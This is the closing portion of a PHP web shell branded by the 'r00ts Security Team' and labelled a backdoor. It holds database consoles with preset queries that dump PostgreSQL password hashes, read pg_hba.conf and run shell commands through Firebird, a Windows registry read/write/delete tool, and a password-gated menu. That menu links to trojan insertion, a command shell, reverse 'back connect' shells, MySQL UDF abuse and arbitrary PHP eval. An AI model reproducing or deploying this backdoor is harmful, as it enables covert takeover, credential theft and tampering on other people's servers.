<select onchange="return ifxFull(options[selectedIndex].value)">
	<option value="0" selected>command</option>
        <option value="1">dbservername</option>
        <option value="1">databases</option>
        <option value="2">tables</option>
        <option value="3">columns</option>
        <option value="4">hashes</option>
</select>
<input type="hidden" name="action" value="ifxquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($ifxaction == 'ifxquery'){
    $ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());
    $ifxresult = ifx_query($ifxquery,$ifxlink) or die (ifx_errormsg());
    $ifxrow=ifx_fetch_row($ifxresult);
    echo '<font face="verdana">';
    echo '<table border="1" cellpadding="1" cellspacing="2">';
    echo "\n<tr>\n";
    for ($i=0; $i<ifx_num_fields($ifxresult); $i++)
{
echo '<td bgcolor="#228B22"><b>'.
ifx_fieldproperties($ifxresult);
echo "</b></td>\n";
}
echo "</tr>\n";
mysql_data_seek($ifxresult, 0);
while ($ifxrow=ifx_fetch_row($ifxresult))
{
echo "<tr>\n";
for ($i=0; $i<ifx_num_fields($ifxresult); $i++ )
{
echo '<td bgcolor="#B8B8E8">';
echo "$ifxrow[$i]";
echo '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
echo "</font>";
ifx_free_result($ifxresult);
ifx_close();
}
    }
elseif ($db=="db2"){
$db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost';
$db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000';
$db2user = isset($_POST['db2user']) ? $_POST['db2user'] : 'root';
$db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '123456';
$db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql';
$db2action = isset($_POST['action']) ? $_POST['action'] : '';
$db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : '';
$db2query = stripslashes($db2query);
print<<<END
<form method="POST" name="db2form" action="?s=w&db=db2">
<div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px">
Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px">
User:<input type="text" name="db2user" value="{$db2user}" style="width:100px">
Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">
Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br><br>
<script language="javascript">
function db2Full(i){
	Str = new Array(4);
        Str[0] = "";
	Str[1] = "select schemaname from syscat.schemata;";
        Str[2] = "select name from sysibm.systables;";
        Str[3] = "select colname from syscat.columns where tabname='table_name';";
        Str[4] = "db2 get db cfg for db_name;";
	db2form.db2sql.value = Str[i];
	return true;
}
</script>
<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>
<select onchange="return db2Full(options[selectedIndex].value)">
	<option value="0" selected>command</option>
        <option value="1">databases</option>
        <option value="1">tables</option>
        <option value="2">columns</option>
        <option value="3">db config</option>
</select>
<input type="hidden" name="action" value="db2query">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($myaction == 'db2query'){
//$db2string = "DRIVER={IBM DB2 ODBC DRIVER};DATABASE=$db2dbname;"."HOSTNAME=$db2host;PORT=$db2port;PROTOCOL=TCPIP;UID=$db2user;PWD=$db2pass;";
$db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());
$db2result = db2_exec($db2link,$db2query) or die(db2_stmt_errormsg());
$db2row=db2_fetch_row($db2result);
echo '<font face="verdana">';
echo '<table border="1" cellpadding="1" cellspacing="2">';
echo "\n<tr>\n";
for ($i=0; $i<db2_num_fields($db2result); $i++)
{
echo '<td bgcolor="#228B22"><b>'.
db2_field_name($db2result);
echo "</b></td>\n";
}
echo "</tr>\n";
while ($db2row=db2_fetch_row($db2result))
{
echo "<tr>\n";
for ($i=0; $i<db2_num_fields($db2result); $i++ )
{
echo '<td bgcolor="#B8B8E8">';
echo "$db2row[$i]";
echo '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
echo "</font>";
db2_free_result($db2result);
db2_close();
}
    }
elseif($db == "fb") {
$fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost';
$fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : '';
$fbpath = str_replace("\\\\", "\\", $fbpath);
$fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : 'sysdba';
$fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : 'masterkey';
$fbaction = isset($_POST['action']) ? $_POST['action'] : '';
$fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : '';
$fbquery = stripslashes($fbquery);
print<<<END
<form method="POST" name="fbform" action="?s=w&db=fb">
<div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">
Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">
User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">
Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>
<script language="javascript">
function fbFull(i){
	Str = new Array(5);
        Str[0] = "";
	Str[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;";
        Str[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';";
        Str[3] = "input 'D:\\createtable.sql';";
        Str[4] = "shell netstat -an;";
	fbform.fbsql.value = Str[i];
	return true;
}
</script>
<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>
<select onchange="return fbFull(options[selectedIndex].value)">
	<option value="0" selected>command</option>
        <option value="1">tables</option>
        <option value="2">columns</option>
        <option value="3">import sql</option>
        <option value="4">shell</option>
</select>
<input type="hidden" name="action" value="fbquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($fbaction == 'fbquery'){
    $fblink = ibase_connect($fbhost.':'.$fbpath,$fbuser,$fbpass) or die(ibase_errmsg());
    $fbresult = ibase_query($fblink,$fbquery) or die(ibase_errmsg());
    echo '<font face="verdana">';
    echo '<table border="1" cellpadding="1" cellspacing="2">';
    echo "\n<tr>\n";
    for ($i=0; $i<ibase_num_fields($fbresult); $i++)
    {
    echo '<td bgcolor="#228B22"><b>'.
    ibase_field_info($fbresult, $i);
    echo "</b></td>\n"; 
    }
    echo "</tr>\n";
    ibase_field_info($fbresult, 0);
    while ($fbrow=ibase_fetch_row($fbresult))
{
echo "<tr>\n";
for ($i=0; $i<ibase_num_fields($fbresult); $i++ )
{
echo '<td bgcolor="#B8B8E8">';
echo "$fbrow[$i]";
echo '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
echo "</font>";
ibase_free_result($fbresult);
ibase_close();
    }
    }
else{
$pghost = isset($_POST['pghost']) ? $_POST['pghost'] : 'localhost';
$pguser = isset($_POST['pguser']) ? $_POST['pguser'] : 'postgres';
$pgpass = isset($_POST['pgpass']) ? $_POST['pgpass'] : '';
$pgdbname = isset($_POST['pgdbname']) ? $_POST['pgdbname'] : 'postgres';
$pgaction = isset($_POST['action']) ? $_POST['action'] : '';
$pgquery = isset($_POST['pgsql']) ? $_POST['pgsql'] : ''; 
$pgquery = stripslashes($pgquery);
print<<<END
<form method="POST" name="pgform" action="?s=w">
<div class="actall">Host:<input type="text" name="pghost" value="{$pghost}" style="width:100px;">
User:<input type="text" name="pguser" vaule="{$pguser}" style="width:100px">
Pass:<input tyoe="text" name="pgpass" value="{$pgpass}" style="width:100px">
Dbname:<input type="text" name="pgdbname" value="{$pgdbname}" style="width:100px"><br><br>
<script language="javascript">
function pgFull(i){
	Str = new Array(7);
	Str[0] = "";
        Str[1] = "select version();";
        Str[2] = "select datname from pg_database;";
        Str[3] = "select relname from pg_stat_user_tables limit 1 offset n;";
        Str[4] = "select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;";
        Str[5] = "select usename,passwd from pg_shadow;";
	Str[6] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));";
	pgform.pgsql.value = Str[i];
	return true;
}
</script>
<textarea name="pgsql" style="width:600px;height:200px;">{$pgquery}</textarea><br>
<select onchange="return pgFull(options[selectedIndex].value)">
	<option value="0" selected>command</option>
        <option value="1">version</option>
        <option value="2">databases</option>
        <option value="3">tables</option>
        <option value="4">columns</option>
        <option value="5">hashes</option>
	<option value="6">pg_hb.conf</option>
</select>
<input type="hidden" name="action" value="pgquery">
<input class="bt" type="submit" value="Query"></div></form>
END;

if ($pgaction == 'pgquery'){
$pgconn = pg_connect("host=$pghost dbname=$pgdbname user=$pguser password=$pgpass ") 
        or die( 'Could not connect: ' . pg_last_error()); 
$pgresult = pg_query($pgquery) or die( 'Query failed: '.pg_last_error()); 
$pgrow=pg_fetch_row($pgresult);
echo '<font face="verdana">';
echo '<table border="1" cellpadding="1" cellspacing="2">';
echo "\n<tr>\n";
for ($i=0; $i<pg_num_fields($pgresult); $i++)
{
echo '<td bgcolor="#228B22"><b>'.
pg_field_name($pgresult, $i);
echo "</b></td>\n";
}
echo "</tr>\n";
pg_result_seek($pgresult, 0);
while ($pgrow=pg_fetch_row($pgresult))
{
echo "<tr>\n";
for ($i=0; $i<pg_num_fields($pgresult); $i++ )
{
echo '<td bgcolor="#B8B8E8">';
echo "$pgrow[$i]";
echo '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
echo "</font>";
pg_free_result($pgresult);
pg_close();
}
}
    }

//control Registry with php
function phpreg(){
$shell1 = new COM("wscript.shell") or die("require windows host");
$action = isset($_POST['action']) ? $_POST['action'] : '';  
echo '<br>';
echo '<div class="actall"><h5>Read & Write &Del reg</h5><br></div>';
echo '<br>';
print<<<END
<TR><form   action=""   method="post">   
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>   
Rpath:&nbsp<input type="hidden" name="action" value="read">   
<input type="text" name="rpath" value="{$rpath}" size="70">   
<input class="bt" type="submit" value="Read"></form></TD></TR><br><br></div>   
END;
   
$rpath = isset($_POST['rpath']) ? $_POST['rpath'] : '';   
$rpath = str_replace("\\\\", "\\", $rpath);      
if   ($action=="read"){
$out = $shell1->RegRead($rpath);
echo '<pre>'.var_dump($out).'</pre>';   
echo '<br><br>';  
}

print<<<END
<TR><form   action=""   method="post">   
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>Wpath:      
<input type="text" name="wpath" value="{$wpath}" size="70"><BR><br> 
Wtype:&nbsp<input type="text" name="wtype" value="{$wtype}" size="20">
Wvalue:&nbsp<input type="text" name="wvalue" value="{$wvalue}" size="30">
<input type="hidden" name="action" value="write">  
<input class="bt" type="submit" value="write"></form></TD></TR><br><br><br></div>   
END;
   
$wpath = isset($_POST['wpath']) ? $_POST['wpath'] : '';   
$wpath = str_replace("\\\\", "\\", $wpath);      
$wtype = isset($_POST['wtype']) ? $_POST['wtype'] : '';
$wvalue = isset($_POST['wvalue']) ? $_POST['wvalue'] : '';
if   ($action=="write"){
$shell1->RegWrite($wpath, $wvalue, $wtype);     
}

print<<<END
<TR><form   action=""   method="post">   
<div class="actall"><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>  
Dpath:<input type="hidden" name="action" value="del">   
<input type="text" name="dpath" value="{$dpath}" size="70">   
<input class="bt" type="submit" value="Del"></form></TD></TR><br><br></div>   
END;
   
$dpath = isset($_POST['dpath']) ? $_POST['dpath'] : '';   
$dpath = str_replace("\\\\", "\\", $dpath);      
if   ($action=="del"){
$out = $shell1->RegDelete($dpath);  
}
    }
function Root_Login($MSG_TOP)
{
global $lanip;
print<<<END

<html>
	<body style="background:#FFFFF;">
		<center>
		<form method="POST">
		<div style="width:551px;height:201px;margin-top:100px;background:threedface;border-color: #000000 #999999 #FFFFF;border-style:solid;border-width:1px;">
		<div style="width:550px;height:22px;padding-top:2px;color:#FFFFFF;background:#000000;clear:both;"><b>{$MSG_TOP}</b></div>
		<div style="width:550px;height:80px;padding-top:30px;color:;clear:both;">PASS:<input type="password" name="b4che10rpass" style="width:200px;height:20px"></div>
		<div style="width:550px;height:50px;clear:both;"><input class="bt" type="submit" value="login"></div>
                <h5>@Copyright spider Clean Backdoor and plus & modify by r00ts Security Team<h5>
                <h5>Your IP : {$lanip} <h5>
		</div>
		</form>
		</center>
	</body>
</html>
END;
	return false;
}

function WinMain()
{
	$Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);
	$Server_OS = PHP_OS;
	$Server_Soft = $_SERVER["SERVER_SOFTWARE"];
print<<<END
<html>
	<title> r00ts Security Team New PHP Shell 2012-2013 </title>
	<head>
		<style type="text/css">
			*{padding:0; margin:0;}
			body{background:#FFFFF;font-family:"Verdana", "Tahoma", sans-serif; font-size:13px;margin:0 auto; text-align:center;margin-top:5px;word-break:break-all;}
			.outtable {height:600px;width:%90;color:#000000;border-top-width: 2px;border-right-width: 2px;border-bottom-width: 2px;border-left-width: 2px;border-top-style: outset;border-right-style: outset;border-bottom-style: outset;border-left-style: outset;border-top-color: #FFFFFF;border-right-color: #8c8c8c;border-bottom-color: #8c8c8c;border-left-color: #FFFFFF;background-color: threedface;}
			.topbg {padding-top:3px;text-align: left;font-size:12px;font-weight: bold;height:22px;width:950px;color:#FFFFFF;background: #293F5F;}
			.bottombg {padding-top:3px;text-align: center;font-size:12px;font-weight: bold;height:22px;width:950px;color:#000000;background: #888888;}
			.listbg {font-family:'lucida grande',tahoma,helvetica,arial,'bitstream vera sans',sans-serif;font-size:13px;width:130px;}
			.listbg li{padding:3px;color:#000000;height:25px;display:block;line-height:26px;text-indent:0px;}
			.listbg li a{padding-top:2px;background:#BBBBBB;color:#000000;height:25px;display:block;line-height:24px;text-indent:0px;border-color:#999999 #999999 #999999 #999999;border-style:solid;border-width:1px;text-decoration:none;}
		</style>
		<script language="JavaScript">
			function switchTab(tabid)
			{
				if(tabid == '') return false;
				for(var i=0;i<=17;i++)
				{
					if(tabid == 't_'+i) document.getElementById(tabid).style.background="#FFFFFF";
					else document.getElementById('t_'+i).style.background="#BBBBBB";
				}
				return true;
			}
		</script>
	</head>
	<body>
		<div class="outtable">
		<div class="topbg"> &nbsp; {$Server_IP} - {$Server_OS} </div>
			<div style="height:546px;">
				<table width="100%" height="100%" border=0 cellpadding="0" cellspacing="0">
				<tr>
				<td width="140" align="center" valign="top">
					<ul class="listbg">
						<li><a href="?s=a" id="t_0" onclick="switchTab('t_0')" style="background:#FFFFFF;" target="main"> File Manager </a></li>
						<li><a href="?s=b" id="t_1" onclick="switchTab('t_1')" target="main"> Insert Trojan </a></li>
						<li><a href="?s=c" id="t_2" onclick="switchTab('t_2')" target="main"> Clean Trojan </a></li>
						<li><a href="?s=d" id="t_3" onclick="switchTab('t_3')" target="main"> Bulk Replace </a></li>
						<li><a href="?s=e" id="t_4" onclick="switchTab('t_4')" target="main"> Search Trojan </a></li>
                                                <li><a href="?s=u" id="t_21" onclick="switchTab('t_21')" target="main"> Search File</a></li>
                                                <li><a href="?s=v" id="t_22" onclick="switchTab('t_22')" target="main"> FTP Connector</a></li>
						<li><a href="?s=f" id="t_5" onclick="switchTab('t_5')" target="main"> Server Info </a></li>
						<li><a href="?s=g" id="t_6" onclick="switchTab('t_6')" target="main"> CmdShell </a></li>
						<li><a href="?s=h" id="t_7" onclick="switchTab('t_7')" target="main"> Win API </a></li>
						<li><a href="?s=i" id="t_8" onclick="switchTab('t_8')" target="main"> Scan Port </a></li>
						<li><a href="?s=j" id="t_9" onclick="switchTab('t_9')" target="main"> Convert Shellcode </a></li>
						<li><a href="?s=k" id="t_10" onclick="switchTab('t_10')" target="main"> Weak Scan </a></li>
						<li><a href="?s=l" id="t_11" onclick="switchTab('t_11')" target="main">Linux Back Connect </a></li>
                                                <li><a href="?s=r" id="t_12" onclick="switchTab('t_12')" target="main">PHP Back Connect </a></li>
						<li><a href="?s=m" id="t_13" onclick="switchTab('t_13')" target="main"> Mysql UDF </a></li>
						<li><a href="?s=n" id="t_14" onclick="switchTab('t_14')" target="main"> Mysql statement </a></li>
                                                <li><a href="?s=o" id="t_15" onclick="switchTab('t_15')" target="main">Win Reg Shell </a></li>
                                                <li><a href="?s=z" id="t_16" onclick="switchTab('t_16')" target="main">Serv-U </a></li>
                                                <li><a href="?s=x" id="t_17" onclick="switchTab('t_17')" target="main"> Eval PHP Code </a></li>
                                                <li><a href="?s=w" id="t_18" onclick="switchTab('t_18')" target="main"> Other DB Connect </a></li>
						<li><a href="?s=logout" id="t_20" onclick="switchTab('t_20')"> Logout </a></li>
					</ul>
				</td>
				<td>
				<iframe name="main" src="?s=a" width="100%" height="100%" frameborder="0"></iframe>
				</td>
				</tr>
				</table>
			</div>
		<div class="bottombg"> {$Server_Soft} </div>
		</div>
	</body>
</html>
END;
return false;
}

if(get_magic_quotes_gpc())
{
	$_GET = Root_GP($_GET);
	$_POST = Root_GP($_POST);
}
if($_GET['s'] == 'logout')
{
	setcookie('admin_b4che10rpass',NULL);
	die('<meta http-equiv="refresh" content="0;URL=?">');
}
if($_COOKIE['admin_b4che10rpass'] != md5($password))
{
	ob_start();
	$MSG_TOP = 'LOGIN';
	if(isset($_POST['b4che10rpass']))
	{
		$cookietime = time() + 24 * 3600;
		setcookie('admin_b4che10rpass',md5($_POST['b4che10rpass']),$cookietime);
                if(md5($_POST['b4che10rpass']) == md5($password)){die('<meta http-equiv="refresh" content="1;URL=?">');}
		else{$MSG_TOP = 'This is my privileges, What are you doing man ?';}
               
	}
	Root_Login($MSG_TOP);
        exit();
	ob_end_flush();
}

if(isset($_GET['s'])){$s = $_GET['s'];if($s != 'a' && $s != 'n')Root_CSS();}else{$s = 'MyNameIsHacker';}
$p = isset($_GET['p']) ? $_GET['p'] : File_Str(dirname(__FILE__));

switch($s)
{
	case "a" : File_a($p); break;
	case "b" : Guama_b(); break;
	case "c" : Qingma_c(); break;
	case "d" : Tihuan_d(); break;
	case "e" : Antivirus_e(); break;
	case "f" : Info_f(); break;
	case "g" : Exec_g(); break;
	case "h" : Com_h(); break;
	case "i" : Port_i(); break;
	case "j" : Shellcode_j(); break;
	case "k" : Crack_k(); break;
	case "l" : Linux_l(); break;
	case "m" : Mysql_m(); break;
	case "n" : Mysql_n(); break;
	case "o" : phpreg(); break;
        case "p" : File_Edit($_GET['fp'],$_GET['fn']); break;
        case 'x' : phpcode();break;
        case 'r' : phpsocket();break;
        case 'w' : otherdb();break;
        case 'z' : su();break;
        case 'u' : Findfile_j(); break;
        case 'v' : ftp_php();break;
	default: WinMain(); break;
}
?>